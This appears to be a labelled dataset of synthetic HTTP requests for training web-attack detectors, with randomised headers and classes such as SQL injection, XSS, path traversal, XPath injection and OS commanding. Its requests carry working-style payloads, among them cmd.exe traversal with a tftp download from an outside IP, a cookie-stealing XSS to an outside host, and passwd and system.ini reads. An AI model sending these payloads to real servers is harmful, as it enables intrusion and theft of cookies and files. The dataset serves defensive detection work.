Accept-Language: uXq-6ieeIn, se-iiZe;q=0.7
Cache-Control: no-cache
Client-ip: 225.50.172.247
Cookie: iza=250635
Cookie2: $Version="0"
Date: Tue, 18 May 04 17:42:24 GMT
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: ohder2=drntNg
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 02 Apr 07 08:45:47 UTC
If-Unmodified-Since: Sat, 24 Jan 09 23:48:29 UTC
If-Match: *
If-None-Match: "eZ9Cte-4lHS.JJ6gQOr"
If-Range: "lzLhUagNQisyk3rR7D0u"
Max-Forwards: 5107
MIME-Version: 9.1
Pragma: 0nhxnu=nnOh
Proxy-Authorization: YOigog n4on=aery00e
Authorization: NTLM ZWkxbGFuc3RibHR0dG1nYnJoZGdBaTJybGphc2NldDNzMWQ4aWx3aHJp
Range: 9644-,6569-1848
Referer: /ysfutjeh/odwehcsn.css
TE: gzip
Trailer: Accept-Language
User-Agent: i2hdi9sO (ecTloTPJGL)
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2658x747
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: identity
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44259
Start - Id: 44438
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tsmc.fr
Connection: aG2oe
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate, compress
Accept-Language: otegfr-e;q=0.8
Cache-Control: max-stale
Client-ip: 169.69.255.164
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Tue, 10 May 05 13:52:42 CET
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Sun, 04 Sep 05 16:52:39 UTC
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: "W0A@U3ZerU._r88sFYn"
If-None-Match: "UHJBzUl.9xwBLFXn"
If-Range: *
Max-Forwards: 58
MIME-Version: 1.5
Pragma: orIohotr=epuLb
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Digest response="CD60c21d29faf4F13A7CA0f2F88Cf0FA"
Range: 6-02287,72753-
Referer: http://frehO.cz/isrezug/meilsLp/irOhs/sstoid/sdt8.html
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.1 (compatible; MSIE 7.2; Linux i386; tHUtiSn)
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 187.145.72.149
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44438
Start - Id: 35368
class: SqlInjection
GET /ssgxXClqxH@pM441sV5w/n.PhayFzR7bUhbu/tm3idshdddh6e1jn/p1sxLWVcVYsamOII/necddio.js?u5aobgsoundwwOdC=758103&satatcsauct=OrigText%27OR%27zenht%27+++%3D++%27to%27&shtr=0807&rmocuiel=e2sSa&nanrn8=dnsdosodyttocdfWu&osno2unSraTy=np%25where&iOysD=twgeta&ioldttEhrwno7i=a4VAtUSb-n&iqferlegeo=ir9sIniRbEobrhehio&snXovoi6=squ HTTP/1.0
Host: 30.87.147.212
Connection: close
Accept: text/*;q=0.7, application/rtf;q=0.4, text/*
Accept-Charset: euc-tw;q=0.3, x-mac-icelandic, euc-jp;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie: sertfjfEhrLehr=8520884;Wf0m_4anode=1227430;of8idD=456;laC3lsEel=eOQLtcg
Cookie2: $Version="1"
Date: Mon, 04 Apr 05 23:33:20 UTC
ETag: "hOfZpQKb4lvYuJI"
Expect: 06leorna
From: tevu@zin09xt.com
If-Unmodified-Since: Sat, 16 Apr 05 18:20:05 CET
If-Match: "DTCBdNQ4Rklg9yc"
If-None-Match: "bFdRT8xK21ndwI7ubf"
If-Range: "Ec.s1dMg7C3NaCit2pOk"
Max-Forwards: 1541
MIME-Version: 9.1
Pragma: no-cache
Authorization: N9er ltrrow=80sdtd
Range: 187-
Referer: /usn9wrc1/wfSs/i7dC/rwb9/tkirrj.pdf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.9 (compatible; faeyvye; Open BSD i586; tTj8hhagd; ncheel83e; scoAnNbu)
UA-Pixels: 1597x768
Via: 9.6 65.47.28.46, 4.2 www.seelb.jpg:13015, 4.8 5.25.104.226
Transfer-Encoding: compress
Warning: 105 www.e4siinia.jpeg "yeoeae8edtaeehqtNems" 
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35368
Start - Id: 46646
class: XSS
GET /.ZrOG/i50rL/.gsXq.png?IuGreo=sdEaTqc4R&2YHj=465&nse=5connect&CP5nPIsYMcb=av&8Kxp_LfVallCmochafZ=nZOhX&exwenpgrlenilty=vfshjaiDtgeutT&vMld=iric90e2&eTbnaAa=67861402&2yytea=a2oid&2oa4awektdW=fesjatheqeteN&Nb=hometopenhssnr9N%29aSge&iaKi=ik1EZI HTTP/1.1
Host: www.xpvro5s.org:80
Connection: keep-alive
Accept: video/*
Accept-Charset: x-mac-cyrillic, x-mac-cyrillic, iso-8859-3
Accept-Encoding: gzip, compress, compress, identity, deflate
Accept-Language: <img  dynsrc=    " javascript:  [alert ('uoqmor8');]   "    >
Cache-Control: no-transform
Client-ip: 37.218.107.50
Cookie: ddiFmles5tuj=3318;uyv9ustqmIh=vslWHC1y8;82aw=61442;ridkwehimnGyii=9313475;7r79meu=select%u
Date: Sat, 01 Dec 07 05:21:05 UTC
ETag: W/"x_dxmcYMKBlQmZ3"
Expect: nrfk
If-Modified-Since: Fri, 02 May 08 13:23:51 UTC
If-Match: *
If-None-Match: *
If-Range: "ewJu9VgBZU.Uxntv"
Max-Forwards: 1272
MIME-Version: 1.7
Referer: http://C59zooi.fr/SwdooZ/Thurl/drsa/boilE4.jsp
TE: deflate;q=0.8,trailers
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 6.8; 0t-le; rv:9.6.1) Gecko/79768182
Via: 2.1 137.126.128.179, FTP/1.3 243.108.222.212, HTTP/4.7 4.75.212.179
Transfer-Encoding: compress

null

End - Id: 46646
Start - Id: 36064
class: PathTransversal
GET /rawzJ8KuxFO4/utv6z/o4sh9hehmrsp/OhXioessdmrdeiuptiel/bRViTunioniT/NbLnYqcnEtorl4.dll?k-huobjectZsqwp-c=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: www.corlke.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: lssact-ht4ibeZ;q=0.8, iei-3atmqrce;q=0.9, w7-tlt87ul;q=0.2, mmraiT-9
Cache-Control: Nb=y
Client-ip: 75.78.7.59
Cookie: hdo=t3b
Cookie2: $Version="8"
Date: Tue, 01 Jun 04 21:30:44 CET
ETag: W/"d2LO2WEqbtZNb2rt"
Expect: rthr
From: Esva@5c4oorIai.it
If-Modified-Since: Fri, 21 Sep 07 18:35:38 GMT
If-Unmodified-Since: Mon, 13 Oct 08 23:45:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Aug 09 13:31:24 UTC
Max-Forwards: 0489
MIME-Version: 1.3
Pragma: VHK=soA
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: hitiey Ai5g4Eh9=tsvbr
Range: -31,-3,49859-
Referer: http://www.itroo.ch/etaa/eEl9ra/d4hbnwuE.pdf
TE: deflate
Trailer: Warning
User-Agent: 1vvt.KF7Er http://www.8dlnr.com
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 745x4826
Via: FTP/2.4 www.bosrzo.shtml, 2.7 159.245.152.233, 4.6 www.ithom.jpeg
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36064
Start - Id: 47367
class: XSS
GET /lEWEE_Hkha7/libotelneto5exec/1GhBrEAMWQBhLBHkk2a/iiOxkoyDHbV9LmZxiIj/cS5soerN/fromGETF@ToA/samT7mfnodeNsIQO_smD/cb6sb8cOwzYWHO0/N9pY/CYFVK47Kmailsystem2xl/auct@8re.mdb?ehshet6S=lxefaetonbIo&hERahnii=5esudrasthtesyof&aAg=LyoayrdjR2un6n&eifenmEa2s=tenh&jllhlo2td5n=sgei8&xm5ikHteels=euiea7SemdO1ro3&dqwM=%26%3Cscript++%3E%5Balert+++%28%27n7yytewnEo%27%29%3B%5D%3C%2Fscript++%3E&i2=09&eraleYaO=537&Hhsqse9aEyrO=ssewo6bp5dr HTTP/1.1
Host: 121.252.93.97:0845
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.0, x-mac-cyrillic;q=0.0, x-mac-icelandic;q=0.4, euc-tw;q=0.0, utf-8
Accept-Encoding: identity;q=0.6
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 118.97.198.10
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="004"
Date: Mon, 03 Aug 09 14:58:07 CET
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Fri, 22 Feb 08 07:45:28 CET
If-Unmodified-Since: Tue, 19 Jun 07 05:35:27 CET
If-Match: "bolaVc@GADCm-kwZJ"
If-None-Match: *
If-Range: Tue, 01 Jun 04 01:46:41 GMT
Max-Forwards: 78
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: e3ns peuba=sntTat
Range: -773710,2145-890
Referer: /ee0oem/dte0/htei/otscyi/osoen.pdf
TE: deflate,trailers
Trailer: Trailer
User-Agent: hi4PTQD http://www.pmDypl.net
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: 4.8 www.Ghtunnms.gif, 5.4 www.u9EA.html, FTP/2.9 www.TTasas.js
Transfer-Encoding: srSoe; iOhim=atq4
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47367
Start - Id: 43759
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: www.ehoe.it:29370
Connection: gtadr41O
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: max-age=07907
Client-ip: 251.209.185.79
Cookie: peDthio=17lnd;tLi5okfRnqntfyf=stamincludecneroiBR;apUaLf=e6angsobdtstaag4;oinar=tpbBqpvUalc;herr5TYosikd=eop2
Cookie2: $Version="1"
Date: Mon, 01 Aug 05 10:27:00 UTC
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: wspr4ebT
From: Roarg8@ntrfj.uk
If-Modified-Since: Wed, 19 May 04 09:48:29 UTC
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 839
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Digest opaque="0s1iie9e"
Range: -541349,6-1
Referer: http://www.nlcvul6t.cz/theite/sozet0/aayu7/si7l/enOlnIcr.cgi
TE: deflate,deflate,chunked;q=0.8
Trailer: Upgrade
User-Agent: hliavtn9tS/0.9.3.1.2
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5283x402
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: yhotE/7.5, Kihlr/2.4
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 036162640155
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43759
Start - Id: 48649
class: XPathInjection
POST /thf2ueldi0JfexceeeH/sgM5cZGv-A_/ztlaa7TU33gsuP/iw9/tbusaqeoeit02sytfyte/r7aleHecEioESn.css? HTTP/1.0
Content-Length: 217
Content-Language: sea9i,d
Content-Encoding: gzip
Content-Location: http://www.hy7t.org/t8tacl/uppd/tiie/a3ersi.gif
Content-MD5: aG5xc25ldGRlc3duaWxhYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Sun, 07 Mar 10 11:17:41 GMT
Host: 49.94.207.132
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-950;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 43.212.151.158
Cookie: efubmcaoet=fs;rcnInde8auyTd=56t
Cookie2: $Version="55"
Date: Tue, 21 Sep 04 20:28:07 UTC
ETag: "bQtfcZLDIz1no2ICu5"
Expect: shdr
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Wed, 29 Jun 05 02:10:57 UTC
If-Match: "khpo7Gi5AlpzPwYH"
If-None-Match: "etZty1Mvx6yWfzC"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 51
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: http://8hreie.org/K9omcnt/nsiOkt/8e4r0PLa/W3h1juT/eyhcl4.bin
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: wfjEobx (tl8V6O; eHkrOJ; lUH7qRmG; oHwcBOB4v; avQzu_Op@2)
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/9.8 171.243.31.230
Transfer-Encoding: identity
Upgrade: itU/7.7, Hiees/3.1, oiur/4.5, drrff/2.0, r9e5nh/3.5
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_DVowgetselectzJ6ZX1=81selusMloxttlne&fouetatioMsdi=wfa/hts/tip9/child::node()[  position()=8]    |    ze/pstw/cioSt/child::text()[position()=36]  or  '6bi'= '

End - Id: 48649
Start - Id: 43178
class: OsCommanding
GET /vhTgW2LB_9s/hg.lkMDWzK/ahoaaubAfue/shnor/.OXnullwaS8UincludeT/b0jPApxfKQZ7k23l/Cn4lf5edes/emytVudotxmlyjn.html?a2=oar%2B&sno53Gs=617652&gNEitalna=aE%402&esnctsRheiobeol=%7C+++echo++%22+Content-Type%3A+text%2Fhtml%22++%3B+++echo++%22%22+++%3B+++++id++++%5C0&4unsrcusss=yAtmstyledfpUly%3F%5Cmxu0&elee=hdhrdTc&pfdeia0jIa=u5xG4_&denueAaho=s%2BoitiW%5Con%29lx&tezHlsl=87988&aAuT9nrb=4227&kleierSxo=Ta&6urfuUaMI6orlos=E3C9TtmpaaEoavHs&a9a3F5Lsa6seame=0hbjo HTTP/1.1
Host: 124.208.110.133:80
Connection: eiecJee
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, compress;q=0.2, identity, gzip
Accept-Language: *
Cache-Control: hla=aMcnti
Client-ip: 101.140.81.249
Cookie: enPf=/';eamn=3zajAV4;4eSre=chmiuLhhxsa9;sRt=svs ;td=n3m;elosaetmugea=ns]
Cookie2: $Version="74"
Date: Sat, 10 Jul 04 09:22:15 CET
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Tue, 17 May 05 01:38:00 CET
If-Unmodified-Since: Sun, 01 Feb 04 16:25:21 CET
If-Match: "HH0onu5_nieijQ1.Bi"
If-None-Match: "rAUssx1Fbi3Jr8vZjYvV"
If-Range: *
Max-Forwards: 10
MIME-Version: 6.0
Pragma: eitwtSi='rqxhao'
Proxy-Authorization: Basic Ymx5bzpuOW9hMEl0
Authorization: onwph lG2cieBg=omtw
Range: 332370-1588,656-95
Referer: /r5Io/ens5/tnua9aYS/hfuh.bin
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: eIKkqAYkL3 http://www.zts1.ch
UA-CPU: Sparc
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 953x846
Via: rsytN/4.6 187.86.61.8
Transfer-Encoding: identity
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 415 2.136.43.50 "wzmsseuobh" "Mon, 09 Jul 07 20:41:04 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43178
Start - Id: 36299
class: PathTransversal
GET /seryaheMRd7mcnhg/otoqtesnni/auGQw7UX.MohlIlv/oj/3hHeIx24F1mR.css?oeoIiewsmeoae=andnn7&aont6ae=36020&7hrgtyx3eeax=4065011&Ppc=c7towfi%25hWh0&omcpIrTotdAqapm=%3Earnd%29&6iertsus=cmdq+%5C%5Bj++%27nbd&5T@v_=%2Fetc%2Fhttpd%2Fhttpd.conf&0loivdsiar=ni%29aorhouuur0&PDch6Hland=tBtds&bweAhnieEgomK=erravaree+%3B&-rm@3w=brkoF&eaUt2Onf3cn=bvea&Rkonstti=taai HTTP/1.1
Host: www.ca6s.gov:80
Connection: close
Accept: text/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.42.72.46
Cookie: etrrxeS=sheuHtiw5aiokldnor
Cookie2: $Version="17"
Date: Wed, 01 Sep 04 21:41:42 UTC
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Tue, 15 Apr 08 01:22:10 UTC
If-Match: "a@uRqWbZkK49VqD"
If-None-Match: "JXAedA1i-p0PTnP"
If-Range: Tue, 15 Dec 09 10:21:51 UTC
Max-Forwards: 522
MIME-Version: 7.2
Pragma: md='u'
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: Digest realm
Range: 9-463
Referer: /aurkUrn/ml1a/eoyu.txt
TE: deflate;q=0.8,deflate,gzip
Trailer: Proxy-Authorization
User-Agent: tuiisnil0hbw
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 7.8 140.247.82.156:56420
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36299
Start - Id: 46190
class: PathTransversal
GET /loslRtcuO8i/l_U_.TT3/8M@5ESHqu0Norx/6nifA/Cldytetirnpsvmkt8/0phRntkOe5s/Glefmas/9UX2T5HbC65perl-/cire3ltEtlle.jpeg?qoa=qzRunionu++ih&lhse5dy6yrw=a6ee3anTyamX&Eorjuc=wE0c6_3&snqDpXaliRrSnti=wwcCn5cuFsarbepb&taQHjf=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&me=gmRrW5Ur%40&bwindow.openO8j=+tlwn HTTP/1.1
Host: 29.31.4.175
Connection: close
Accept: video/quicktime, text/html;q=0.4
Accept-Charset: windows-1257, x-mac-roman, windows-1254, hz-gb-2312;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 68.94.47.234
Cookie: 3xmldC3uDyQUi2=0132598;Qa1stdinJXgboot.iniH=48662
Cookie2: $Version="82"
Date: Sat, 25 Sep 04 08:27:52 UTC
ETag: W/"MLizzqbNdRPN0jiUSt"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Tue, 10 Oct 06 21:07:59 CET
If-Unmodified-Since: Fri, 03 Apr 09 16:48:18 CET
If-Match: "NEpaVxwPI-12jrfUL6"
If-None-Match: *
If-Range: "-Rj9Lq3GxzlX@C-3r-"
Max-Forwards: 00
MIME-Version: 2.5
Pragma: p=famajhe
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: g4eet lfeuzoi7=eeeeogin
Range: -9581,5-242
Referer: http://www.3dg1r.uk/yekun/eeue/cjiksQv.php4
TE: trailers,chunked;q=0.4
Trailer: Host
User-Agent: rmraar9 (aziN-0KYk6; k-E4IfrSI5; tzCcG_B-QY; i1VWvU; ivcmQwB7q-)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: HTTP/3.4 78.216.196.149:850, FTP/4.6 238.157.138.3
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 308717764624238
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46190
Start - Id: 41920
class: SqlInjection
GET /mua/netuo4cnss/ZapViRivfjS30/t9Zz89IaxknPWf.php3?aAta2m1a=caEoeqesqo1tered&36gxld=on_%40bKSXKS&brga=5+&_qi6services23wicQ=%27UNIONALLSELECTfieldFROMstnageengeWHERE%27%27++%3D%27&%uwvF2RphprcpI=tf1rl36kZ&ice=oiEaebzEkh&hp2wykOs5rmdr=s_emKMS&YbLXtQGz=Du%7Ea&nmtekseu=si%3F HTTP/1.0
Host: www.Yst2r1s6rS.uk:80
Connection: close
Accept: video/quicktime;q=0.3, text/*;q=0.9, image/gif;q=0.2
Accept-Charset: iso-10646-ucs-2;q=0.0, ks_c_5601-1987;q=0.4, x-mac-chinesesimp;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 21.123.50.241
Cookie: pshtlhcpanaqii=vft
Cookie2: $Version="615"
Date: Thu, 22 Dec 05 05:12:22 GMT
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: usDda@iceeiIo.gov
If-Modified-Since: Wed, 09 Apr 08 01:18:03 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: 2Ho7ed eirUuuo=behe
Authorization: NTLM ME51ZWllM3RycnNTbHpoZWVVb3NncWlvSGZucklhc011YWF4
Range: -0
Referer: /AoaaaN8s/nsfn/nonclts/deatkbty/Oin8f.shtml
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: 9ewaOcdg/4.8
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9010x724
Via: 9.3 www.ibefT.tiff
Transfer-Encoding: compress
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41920
Start - Id: 46730
class: XSS
GET /ssajen2aVd.cgi?2gyq=8725&m0i2=dirimu&umcy3iewl1reZae=1R3&tfromgMW=546&asiua=golQ9&9Bv9=2E%5CanGsA%24rdy&zndeaeeoc7goqli=swm&uwrg7srtlo=ec%40qIJfk&ii=1&ste=0861560&9wp-fromqLnE=8235747&c1hHc=3&@BqSpassthrufflz11=cDe+k%3Be+tdivoE&xe2hln=91&zxx7ALlscJ=7472724 HTTP/1.0
Host: www.higs.org
Connection: close
Accept: audio/basic;q=0.1, video/*, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: soigun-xt8ihn, iodr-hrhhod, ibit-mhdm;q=0.0, fAbln4na-3b8q
Cache-Control: no-cache
Client-ip: 132.16.81.131
Cookie: lsir7qlOertstt=<img dynsrc    = "   javascript:[window.open('http://239.29.153.157/vesein.dll'+document.cookie);] "   >
Cookie2: $Version="8"
Date: Sun, 31 Oct 04 04:10:57 UTC
ETag: "GTgqffUoInO5cRE"
Expect: 100-continue
From: pNowsRmo@aghbh9m.gov
If-Modified-Since: Sun, 20 Apr 08 21:27:43 UTC
If-Unmodified-Since: Wed, 16 Jul 08 16:05:06 CET
If-Match: *
If-None-Match: "Opry@I7.-3UISGO3vYox"
If-Range: *
Max-Forwards: 4408
MIME-Version: 6.8
Pragma: no-cache
Authorization: Cnai t6oamu=bnhtnRy
Range: 490-,7202-
Referer: /cutaNrT6/kelh/yatts/handr/slredt.gif
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: p0oAhXza0 http://www.goeaoe1t.cz
UA-OS: Win98
UA-Color: color32
Via: 5.6 www.fth4oAwi.shtml, 0.9 www.5oce.htm
Transfer-Encoding: identity
Upgrade: poc/2.8, r1ikd/6.5, vsn/7.6, p8eWf/7.4
----: -------------------------------------------

null

End - Id: 46730
Start - Id: 45387
class: PathTransversal
PUT /rmkjbNcEj2ozCzx.htm? HTTP/1.0
Content-Length: 188
Content-Language: iqre3,rqe4,Lasdf3q
Content-Encoding: deflate
Content-Location: http://ohwclsm.biz/sumG/usatr/nscd1/e6cmsie.swf
Content-MD5: cmh5YW5ja2NuVEdhaGp5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Oct 04 01:49:23 CET
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: 63.6.50.110
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, deflate;q=0.0, gzip, identity, gzip;q=0.7
Accept-Language: *;q=0.7
Cache-Control: l='eeazoht'
Client-ip: 2.231.241.65
Cookie: tnttcCeEuhttl=secolrtafrnasnftw
Cookie2: $Version="7"
Date: Fri, 27 May 05 03:03:03 GMT
ETag: "_pVbNLjbuA7VtkSTxe50"
Expect: oepa
From: nnrEog@dpyieuR.com
If-Modified-Since: Mon, 23 May 05 19:11:08 CET
If-Unmodified-Since: Thu, 10 Mar 05 07:48:10 UTC
If-Match: "xa4PYB48JBd2Em_Em"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.6
Pragma: dlFio='da9l'
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: w5rt tanRog=ltsbt
Range: 49-
Referer: http://www.zthe.uk/sodmpu/tInqyhai/omhga5c/l3iwc2sn/fncoerN.gif
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.7 (Windows; U; Win98 1.7; yt-pd; rv:9.2.9) Gecko/90133277
UA-CPU: MIPS
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: FTP/7.6 246.12.59.61, ffd/6.1 www.n9a89k.png, FTP/6.7 www.eby2op8y.tiff:928
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 611 158.221.222.98 "nfsr5r0ueesqlqn" "Wed, 02 Mar 05 08:12:12 CET"
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

httpsLyAoY.O=xmlr&ehcine='1&D3wASk=i&.c6pM.D=..........................WINNTsystem.ini&uY=444&iy9oewia=a &rif3=xe5asta8htgc0okIti&@Tdocument_09ALO=E&aW6imseLeqn=eveu7oegenr&ewcterheltg=t

End - Id: 45387
Start - Id: 38869
